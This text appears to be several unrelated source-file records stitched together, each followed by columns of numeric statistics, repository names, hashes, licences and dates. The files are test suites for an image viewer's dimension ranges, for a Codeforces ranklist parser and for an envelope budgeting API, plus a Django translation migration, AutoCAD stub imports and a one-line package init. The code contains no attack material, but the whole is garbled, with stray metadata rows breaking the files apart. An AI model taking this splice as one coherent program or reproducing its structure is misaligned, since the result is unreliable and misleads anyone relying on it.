    for axis, expected in enumerate(expected_ranges):
        assert viewer.dims.range[axis] == expected
    assert viewer.dims.nsteps == [10, 10, 10]
    # Every step along axis 0 must be reachable and sticky.
    for step in range(viewer.dims.nsteps[0]):
        viewer.dims.set_current_step(0, step)
        assert viewer.dims.current_step[0] == step
def test_scaled_and_translated_images():
    """Test scaled and translated images."""
    viewer = ViewerModel()
    np.random.seed(0)
    volume = np.random.random((10, 10, 10))
    viewer.add_image(volume)
    # Half-resolution copy, scaled x2 and shifted along axis 0.
    viewer.add_image(volume[::2], scale=[2, 1, 1], translate=[10, 0, 0])
    expected_ranges = [(0, 18, 1), (0, 9, 1), (0, 9, 1)]
    for axis, expected in enumerate(expected_ranges):
        assert viewer.dims.range[axis] == expected
    assert viewer.dims.nsteps == [19, 10, 10]
    # Every step along the combined axis must be reachable and sticky.
    for step in range(viewer.dims.nsteps[0]):
        viewer.dims.set_current_step(0, step)
        assert viewer.dims.current_step[0] == step
def test_both_scaled_and_translated_images():
    """Test both scaled and translated images."""
    viewer = ViewerModel()
    np.random.seed(0)
    volume = np.random.random((10, 10, 10))
    # Both layers scaled x2 on axis 0; the second also shifted by 20.
    viewer.add_image(volume, scale=[2, 1, 1])
    viewer.add_image(volume, scale=[2, 1, 1], translate=[20, 0, 0])
    expected_ranges = [(0, 38, 2), (0, 9, 1), (0, 9, 1)]
    for axis, expected in enumerate(expected_ranges):
        assert viewer.dims.range[axis] == expected
    assert viewer.dims.nsteps == [20, 10, 10]
    # Every step along the combined axis must be reachable and sticky.
    for step in range(viewer.dims.nsteps[0]):
        viewer.dims.set_current_step(0, step)
        assert viewer.dims.current_step[0] == step
| 35.647059
| 70
| 0.618812
| 387
| 2,424
| 3.790698
| 0.105943
| 0.190866
| 0.218132
| 0.171779
| 0.923654
| 0.90184
| 0.861622
| 0.861622
| 0.819359
| 0.819359
| 0
| 0.084595
| 0.209984
| 2,424
| 67
| 71
| 36.179104
| 0.681462
| 0.05198
| 0
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.37037
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dabd39aef0dadaaac78062270877c1da8518c8b7
| 1,809
|
py
|
Python
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 2
|
2019-06-27T16:00:17.000Z
|
2020-08-14T07:46:05.000Z
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 26
|
2020-02-15T22:39:35.000Z
|
2022-02-19T21:09:01.000Z
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 1
|
2021-11-12T22:30:15.000Z
|
2021-11-12T22:30:15.000Z
|
# Generated by Django 2.2.12 on 2020-05-02 09:36
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 2.2.12).

    Adds per-language (_en / _it) variants of the description and title
    columns on the antagonist and antagonistgoal models — presumably
    produced by a translation layer such as django-modeltranslation;
    confirm against the app's settings before hand-editing.
    Generated file: do not hand-edit field definitions.
    """
    dependencies = [
        ('adventures', '0006_auto_20200502_1130'),
    ]
    operations = [
        migrations.AddField(
            model_name='antagonist',
            name='description_en',
            field=models.TextField(blank=True, null=True, verbose_name='description'),
        ),
        migrations.AddField(
            model_name='antagonist',
            name='description_it',
            field=models.TextField(blank=True, null=True, verbose_name='description'),
        ),
        migrations.AddField(
            model_name='antagonist',
            name='title_en',
            field=models.CharField(max_length=50, null=True, verbose_name='title'),
        ),
        migrations.AddField(
            model_name='antagonist',
            name='title_it',
            field=models.CharField(max_length=50, null=True, verbose_name='title'),
        ),
        migrations.AddField(
            model_name='antagonistgoal',
            name='description_en',
            field=models.TextField(blank=True, null=True, verbose_name='description'),
        ),
        migrations.AddField(
            model_name='antagonistgoal',
            name='description_it',
            field=models.TextField(blank=True, null=True, verbose_name='description'),
        ),
        migrations.AddField(
            model_name='antagonistgoal',
            name='title_en',
            field=models.CharField(max_length=50, null=True, verbose_name='title'),
        ),
        migrations.AddField(
            model_name='antagonistgoal',
            name='title_it',
            field=models.CharField(max_length=50, null=True, verbose_name='title'),
        ),
    ]
| 33.5
| 86
| 0.588723
| 177
| 1,809
| 5.841808
| 0.248588
| 0.139265
| 0.17795
| 0.208897
| 0.851064
| 0.851064
| 0.851064
| 0.805609
| 0.805609
| 0.805609
| 0
| 0.031177
| 0.290768
| 1,809
| 53
| 87
| 34.132075
| 0.774747
| 0.025428
| 0
| 0.851064
| 1
| 0
| 0.159568
| 0.013061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
dad6d9d8b61676f25e557d3c2409faf57a2068d9
| 531
|
py
|
Python
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | 1
|
2020-03-25T03:27:24.000Z
|
2020-03-25T03:27:24.000Z
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ExColumnHeader
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ExListView
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import HelpProvider
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import IInPlaceEditUpdater
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import InPlaceEditControl
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import LabelEllipsis
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ListViewCellEditEventArgs
| 66.375
| 84
| 0.894539
| 56
| 531
| 7.982143
| 0.25
| 0.219239
| 0.344519
| 0.454139
| 0.751678
| 0.751678
| 0.751678
| 0
| 0
| 0
| 0
| 0
| 0.052731
| 531
| 7
| 85
| 75.857143
| 0.888668
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
dae9779e1eb09d8e88bb707ec8f1d00c50c5783f
| 9,006
|
py
|
Python
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 26
|
2015-06-21T16:19:44.000Z
|
2021-11-15T12:32:25.000Z
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 5
|
2015-03-10T06:00:52.000Z
|
2020-01-18T12:59:25.000Z
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 12
|
2015-04-24T17:16:50.000Z
|
2022-01-04T14:21:25.000Z
|
"""
This module provides classes for testing RanklistRow object
"""
import unittest
from codeforces import RanklistRow, Party, ProblemResult
class RanklistRowTests(unittest.TestCase):
    """Tests for loading RanklistRow objects from dicts and JSON strings.

    Fixes applied:
    - The two dict-based tests were named ``load_from_dict`` and
      ``load_only_required_from_dict`` (no ``test_`` prefix), so unittest
      discovery silently never executed them; they are renamed with the
      ``test_`` prefix to match their JSON counterparts.
    - The ~45-line sample payload was copy-pasted four times; it is now
      built by a single helper, with the shared assertions factored out.
    """

    def setUp(self):
        # A fresh row for every test method.
        self.row = RanklistRow()

    @staticmethod
    def _sample_dict(with_last_submission):
        """Return a fresh sample ranklist-row payload.

        ``with_last_submission`` controls whether the optional
        ``lastSubmissionTimeSeconds`` key is present; all other keys are
        the required fields (party, rank, points, penalty,
        successfulHackCount, unsuccessfulHackCount, problemResults).
        """
        d = {
            "party": {
                "contestId": 374,
                "members": [{"handle": "Deception"}],
                "participantType": "CONTESTANT",
                "ghost": False,
                "room": 46,
                "startTimeSeconds": 1387380600
            },
            "rank": 1,
            "points": 4902.0,
            "penalty": 0,
            "successfulHackCount": 11,
            "unsuccessfulHackCount": 1,
            "problemResults": [
                {
                    "points": 312.0,
                    "rejectedAttemptCount": 1,
                    "type": "FINAL",
                    "bestSubmissionTimeSeconds": 4174
                }, {
                    "points": 596.0,
                    "rejectedAttemptCount": 2,
                    "type": "FINAL",
                    "bestSubmissionTimeSeconds": 4583
                }, {
                    "points": 1128.0,
                    "rejectedAttemptCount": 0,
                    "type": "FINAL",
                    "bestSubmissionTimeSeconds": 3751
                }, {
                    "points": 1816.0,
                    "rejectedAttemptCount": 0,
                    "type": "FINAL",
                    "bestSubmissionTimeSeconds": 1430
                }, {
                    "points": 0.0,
                    "rejectedAttemptCount": 0,
                    "type": "FINAL"
                }
            ]
        }
        if with_last_submission:
            d["lastSubmissionTimeSeconds"] = 424242
        return d

    @staticmethod
    def _to_json(d):
        """Serialize the sample dict exactly as the original tests did
        (repr-based, then fixed up to be valid JSON)."""
        return str(d).replace('False', 'false').replace("'", '"')

    def _assert_row_matches(self, d):
        """Assert that ``self.row`` reflects every value in payload ``d``."""
        self.assertEqual(Party(d['party']), self.row.party)
        self.assertEqual(1, self.row.rank)
        self.assertEqual(4902.0, self.row.points)
        self.assertEqual(0, self.row.penalty)
        self.assertEqual(11, self.row.successful_hack_count)
        self.assertEqual(1, self.row.unsuccessful_hack_count)
        self.assertEqual(list(map(ProblemResult, d['problemResults'])),
                         self.row.problem_results)
        if "lastSubmissionTimeSeconds" in d:
            self.assertEqual(d["lastSubmissionTimeSeconds"],
                             self.row.last_submission_time)
        else:
            # Optional field absent -> attribute must be None.
            self.assertIsNone(self.row.last_submission_time)

    def test_load_from_dict(self):
        """Full payload loaded via load_from_dict (was never run: missing
        test_ prefix)."""
        d = self._sample_dict(with_last_submission=True)
        self.row.load_from_dict(d)
        self._assert_row_matches(d)

    def test_load_only_required_from_dict(self):
        """Required-fields-only payload via load_from_dict (was never run:
        missing test_ prefix)."""
        d = self._sample_dict(with_last_submission=False)
        self.row.load_from_dict(d)
        self._assert_row_matches(d)

    def test_load_from_json(self):
        """Full payload loaded via load_from_json."""
        d = self._sample_dict(with_last_submission=True)
        self.row.load_from_json(self._to_json(d))
        self._assert_row_matches(d)

    def test_load_only_required_from_json(self):
        """Required-fields-only payload via load_from_json."""
        d = self._sample_dict(with_last_submission=False)
        self.row.load_from_json(self._to_json(d))
        self._assert_row_matches(d)
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| 33.604478
| 97
| 0.455474
| 645
| 9,006
| 6.269767
| 0.133333
| 0.064046
| 0.13452
| 0.077151
| 0.932987
| 0.932987
| 0.932987
| 0.932987
| 0.928289
| 0.928289
| 0
| 0.063677
| 0.428048
| 9,006
| 267
| 98
| 33.730337
| 0.721413
| 0.036087
| 0
| 0.86758
| 0
| 0
| 0.221491
| 0.062713
| 0
| 0
| 0
| 0
| 0.146119
| 1
| 0.022831
| false
| 0
| 0.009132
| 0
| 0.03653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9712768994f5a1edb806ab5f21f076b623ff8876
| 21,977
|
py
|
Python
|
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops-api
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | null | null | null |
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops-api
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | 10
|
2021-11-02T23:31:56.000Z
|
2021-12-07T03:41:12.000Z
|
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | null | null | null |
"""Tests for /envelope routes."""
from decimal import Decimal
from unittest import main, IsolatedAsyncioTestCase as TestCase
from uuid import UUID
from db_wrapper.model import sql
# internal test dependencies
from tests.helpers.application import (
get_test_client,
get_token_header,
)
from tests.helpers.database import (
setup_user,
setup_account,
setup_transactions,
)
# Route prefix shared by every request in this test module.
BASE_URL = "/envelope"
class TestRoutePostRoot(TestCase):
    """Testing POST /envelope."""
    async def test_valid_request(self) -> None:
        """Testing a valid request's response."""
        # get_test_client yields an HTTP client plus a handle to the
        # backing test database so the created row can be verified.
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database)
            new_envelope = {
                "name": "envelope",
            }
            # Authenticated POST creating the envelope.
            response = await client.post(
                BASE_URL,
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"},
                json=new_envelope)
            with self.subTest(
                    msg="Responds with a status code of 201."):
                self.assertEqual(201, response.status_code)
            with self.subTest(
                    msg="Responds with newly created Envelope's data."):
                body = response.json()
                with self.subTest(msg="Saves the given name."):
                    self.assertEqual(body["name"], new_envelope["name"])
                with self.subTest(msg="Bound to current user in auth token."):
                    self.assertEqual(body["user_id"], str(user_id))
                with self.subTest(msg="Has a UUID identifier."):
                    self.assertTrue(UUID(body["id"]))
                with self.subTest(msg="Starts with zero funds."):
                    self.assertEqual(body["total_funds"], 0)
            # Verify persistence by querying the database directly rather
            # than trusting the response body alone.
            with self.subTest(msg="Saves the Envelope to the database."):
                body = response.json()
                new_id = UUID(body["id"])
                await database.connect()
                query_result = await database.execute_and_return(sql.SQL("""
                SELECT * FROM envelope
                WHERE id = {new_id};
                """).format(new_id=sql.Literal(new_id)))
                await database.disconnect()
                result = query_result[0]
                with self.subTest(
                    msg="Given envelope name & database envelope name match."
                ):
                    self.assertEqual(result["name"], new_envelope["name"])
                with self.subTest(msg="Binds to currently auth'd user."):
                    self.assertEqual(result["user_id"], user_id)
                with self.subTest(msg="Starts with 0 funds."):
                    self.assertEqual(result["total_funds"], 0)
class TestRouteGetRoot(TestCase):
    """Testing GET /envelope."""
    async def test_valid_request(self) -> None:
        """Testing a valid request's response."""
        async with get_test_client() as clients:
            client, database = clients
            # Two users: three envelopes belong to the first, one to the
            # other — the listing must only return the caller's three.
            user_id = await setup_user(database, "first")
            other_id = await setup_user(database, "other")
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 1.00, {user_id}),
                ('envelope', 1.00, {user_id}),
                ('envelope', 1.00, {user_id}),
                ('envelope', 1.00, {other_id});
                """).format(
                user_id=sql.Literal(user_id),
                other_id=sql.Literal(other_id))
            await database.connect()
            await database.execute(add_envelope_query)
            await database.disconnect()
            # Authenticated GET as the first user.
            response = await client.get(
                BASE_URL,
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                msg="Responds w/ all Envelopes belonging to current user."
            ):
                body = response.json()
                self.assertEqual(
                    len(body), 3, msg="Body should contain 3 Envelopes.")
                for item in body:
                    with self.subTest(msg="Envelope has a name."):
                        self.assertEqual(item["name"], "envelope")
                    with self.subTest(
                            msg="Bound to current user in auth token."):
                        self.assertEqual(item["user_id"], str(user_id))
                    with self.subTest(msg="Envelope has a UUID identifier."):
                        self.assertTrue(UUID(item["id"]))
                    with self.subTest(msg="Envelope has funds."):
                        self.assertEqual(item["total_funds"], 1.00)
class TestRouteGetId(TestCase):
    """Testing GET /envelope/{id}."""

    async def _seed_envelope(self, database, user_id):
        # Insert one Envelope with 1.00 funds for ``user_id`` and
        # return the generated row id.
        seed_query = sql.SQL("""
            INSERT INTO envelope
            (name, total_funds, user_id)
            VALUES
            ('envelope', 1.00, {user_id})
            RETURNING
            id;
        """).format(
            user_id=sql.Literal(user_id))
        await database.connect()
        rows = await database.execute_and_return(seed_query)
        await database.disconnect()
        return rows[0]["id"]

    async def test_valid_request(self) -> None:
        """Testing a valid request's response."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            envelope_id = await self._seed_envelope(database, user_id)
            response = await client.get(
                f"{BASE_URL}/{envelope_id}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                    msg="Responds with requested Envelope's data."):
                body = response.json()
                with self.subTest(msg="Includes the Envelope's name."):
                    self.assertEqual(body["name"], "envelope")
                with self.subTest(
                        msg="Bound to current user in auth token."):
                    self.assertEqual(body["user_id"], str(user_id))
                with self.subTest(msg="Has a UUID identifier."):
                    self.assertEqual(body["id"], str(envelope_id))
                with self.subTest(msg="Includes Envelope's funds."):
                    self.assertEqual(body["total_funds"], 1)

    async def test_can_only_get_own_envelopes(self) -> None:
        """A User can't get another User's Envelopes."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            other_id = await setup_user(database, "other")
            envelope_id = await self._seed_envelope(database, user_id)
            # Request the first user's Envelope with the OTHER user's token.
            response = await client.get(
                f"{BASE_URL}/{envelope_id}",
                headers={
                    **get_token_header(other_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 404."):
                self.assertEqual(404, response.status_code)
class TestRoutePutId(TestCase):
    """Testing PUT /envelope/{id}."""

    async def test_valid_request(self) -> None:
        """Testing a valid request's response."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 1.00, {user_id})
                RETURNING
                id;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelope_query)
            await database.disconnect()
            envelope_id = query_result[0]["id"]
            changes = {"name": "new name"}
            response = await client.put(
                f"{BASE_URL}/{envelope_id}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"},
                json=changes)
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                    msg="Responds with requested Envelope's updated data."):
                body = response.json()
                with self.subTest(msg="Includes the Envelope's name."):
                    self.assertEqual(body["name"], changes["name"])
            with self.subTest(msg="Saves changes to the database."):
                body = response.json()
                new_id = UUID(body["id"])
                # Re-read the row directly to prove the PUT was persisted,
                # not merely echoed back in the response.
                await database.connect()
                query_result = await database.execute_and_return(sql.SQL("""
                    SELECT * FROM envelope
                    WHERE id = {new_id};
                """).format(new_id=sql.Literal(new_id)))
                await database.disconnect()
                result = query_result[0]
                self.assertEqual(result["name"], changes["name"])

    async def test_can_only_change_own_envelopes(self) -> None:
        """A User can't change another User's Envelopes."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            other_id = await setup_user(database, "other")
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 1.00, {user_id})
                RETURNING
                id;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelope_query)
            await database.disconnect()
            envelope_id = query_result[0]["id"]
            changes = {"name": "new name"}
            # Attempt the update with the OTHER user's auth token.
            response = await client.put(
                f"{BASE_URL}/{envelope_id}",
                headers={
                    **get_token_header(other_id),
                    "accept": "application/json"},
                json=changes)
            with self.subTest(
                    msg="Responds with a status code of 404."):
                self.assertEqual(404, response.status_code)

    async def test_can_not_update_funds(self) -> None:
        """Funds must be updated via `.../funds/{amount}` endpoint."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 1.00, {user_id})
                RETURNING
                id;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelope_query)
            await database.disconnect()
            envelope_id = query_result[0]["id"]
            changes = {"total_funds": 100000}
            response = await client.put(
                f"{BASE_URL}/{envelope_id}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"},
                json=changes)
            # BUG FIX: the subTest message previously claimed 404, but the
            # route rejects a `total_funds` field with 422 Unprocessable
            # Entity (which is what the assertion has always checked).
            with self.subTest(
                    msg="Responds with a status code of 422."):
                self.assertEqual(422, response.status_code)
class TestRoutePutFunds(TestCase):
    """Testing PUT /envelope/{id}/funds/{amount}."""

    async def test_move_funds_from_available(self) -> None:
        """Testing moving funds from Available Balance."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            account_id = await setup_account(database, user_id)
            # Give the user an Available Balance of 10 to draw from.
            await setup_transactions(database, [Decimal(10)], account_id)
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 0.00, {user_id})
                RETURNING
                id;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelope_query)
            await database.disconnect()
            envelope_id = query_result[0]["id"]
            amount = 5
            response = await client.put(
                f"{BASE_URL}/{envelope_id}/funds/{amount}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                    msg="Responds with Envelope with updated funds."):
                body = response.json()
                self.assertEqual(body["total_funds"], 5)
            with self.subTest(
                    msg="Envelope is updated in database."):
                query = sql.SQL("""
                    SELECT total_funds
                    FROM envelope
                    WHERE id = {envelope_id};
                """).format(
                    envelope_id=sql.Literal(envelope_id))
                await database.connect()
                query_result = await database.execute_and_return(query)
                await database.disconnect()
                self.assertEqual(query_result[0]["total_funds"], 5)
            with self.subTest(
                    msg="Can not move funds if not enough are available."):
                # Only 5 of the original 10 remain available at this point.
                amount = 11
                response = await client.put(
                    f"{BASE_URL}/{envelope_id}/funds/{amount}",
                    headers={
                        **get_token_header(user_id),
                        "accept": "application/json"})
                self.assertEqual(response.status_code, 409)

    async def test_move_funds_from_other_envelope(self) -> None:
        """Testing moving funds from a given Envelope."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            account_id = await setup_account(database, user_id)
            await setup_transactions(database, [Decimal(10)], account_id)
            add_envelopes_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('to', 0.00, {user_id}),
                ('from', 10.00, {user_id})
                RETURNING
                id, name;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelopes_query)
            await database.disconnect()
            # Map the returned rows back to the two seeded Envelopes.
            # (elif: a row has exactly one name, so the checks are exclusive.)
            for result in query_result:
                if result["name"] == "from":
                    from_envelope = result["id"]
                elif result["name"] == "to":
                    to_envelope = result["id"]
            amount = 5
            response = await client.put(
                f"{BASE_URL}/{to_envelope}/funds/{amount}" +
                f"?other={from_envelope}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                    msg="Source Envelope is updated in database."):
                query = sql.SQL("""
                    SELECT total_funds
                    FROM envelope
                    WHERE id = {from_envelope};
                """).format(
                    from_envelope=sql.Literal(from_envelope))
                await database.connect()
                query_result = await database.execute_and_return(query)
                await database.disconnect()
                self.assertEqual(query_result[0]["total_funds"], 5)

    async def test_negative_funds_sends_from_envelope_to_other(self) -> None:
        """Moving negative funds takes from given envelope & gives to other."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            account_id = await setup_account(database, user_id)
            await setup_transactions(database, [Decimal(10)], account_id)
            add_envelopes_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 10.00, {user_id}),
                ('other', 0.00, {user_id})
                RETURNING
                id, name;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelopes_query)
            await database.disconnect()
            for result in query_result:
                if result["name"] == "envelope":
                    envelope = result["id"]
                elif result["name"] == "other":
                    other = result["id"]
            # A negative amount reverses the direction of the transfer.
            amount = -5
            response = await client.put(
                f"{BASE_URL}/{envelope}/funds/{amount}" +
                f"?other={other}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            with self.subTest(
                    msg="Responds with a status code of 200."):
                self.assertEqual(200, response.status_code)
            with self.subTest(
                    msg="Source Envelope is updated in database."):
                query = sql.SQL("""
                    SELECT total_funds
                    FROM envelope
                    WHERE id = {envelope};
                """).format(
                    envelope=sql.Literal(envelope))
                await database.connect()
                query_result = await database.execute_and_return(query)
                await database.disconnect()
                self.assertEqual(query_result[0]["total_funds"], 5)
            with self.subTest(
                    msg="Other Envelope is updated in database."):
                query = sql.SQL("""
                    SELECT total_funds
                    FROM envelope
                    WHERE id = {other};
                """).format(
                    other=sql.Literal(other))
                await database.connect()
                query_result = await database.execute_and_return(query)
                await database.disconnect()
                self.assertEqual(query_result[0]["total_funds"], 5)

    # NOTE: method renamed to fix the "envough" typo; test discovery only
    # requires the `test_` prefix, so no caller depends on the old name.
    async def test_can_not_move_funds_if_not_enough_available(self) -> None:
        """Can not move funds if not enough are available."""
        async with get_test_client() as clients:
            client, database = clients
            user_id = await setup_user(database, "first")
            account_id = await setup_account(database, user_id)
            await setup_transactions(database, [Decimal(10)], account_id)
            add_envelope_query = sql.SQL("""
                INSERT INTO envelope
                (name, total_funds, user_id)
                VALUES
                ('envelope', 0.00, {user_id})
                RETURNING
                id;
            """).format(
                user_id=sql.Literal(user_id))
            await database.connect()
            query_result = \
                await database.execute_and_return(add_envelope_query)
            await database.disconnect()
            envelope_id = query_result[0]["id"]
            # Only 10 is available; asking for 11 must be rejected.
            amount = 11
            response = await client.put(
                f"{BASE_URL}/{envelope_id}/funds/{amount}",
                headers={
                    **get_token_header(user_id),
                    "accept": "application/json"})
            self.assertEqual(response.status_code, 409)
# Allow running this test module directly in addition to test discovery.
if __name__ == "__main__":
    main()
| 36.689482
| 79
| 0.5134
| 2,192
| 21,977
| 4.96031
| 0.073905
| 0.042491
| 0.052423
| 0.062908
| 0.849811
| 0.820841
| 0.790306
| 0.771176
| 0.757932
| 0.743493
| 0
| 0.011914
| 0.38513
| 21,977
| 598
| 80
| 36.750836
| 0.792718
| 0.009146
| 0
| 0.770065
| 0
| 0
| 0.258433
| 0.015757
| 0
| 0
| 0
| 0
| 0.075922
| 1
| 0
| false
| 0
| 0.013015
| 0
| 0.023861
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
977421f580ce1d3eff1f8f153407e47511353549
| 56
|
py
|
Python
|
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | null | null | null |
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | 19
|
2021-07-22T11:18:17.000Z
|
2021-08-20T10:12:17.000Z
|
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | 1
|
2021-07-29T11:56:03.000Z
|
2021-07-29T11:56:03.000Z
|
# from .naive import NerLstm
from .naive import BertLstm
| 28
| 28
| 0.803571
| 8
| 56
| 5.625
| 0.625
| 0.4
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 56
| 2
| 29
| 28
| 0.9375
| 0.464286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
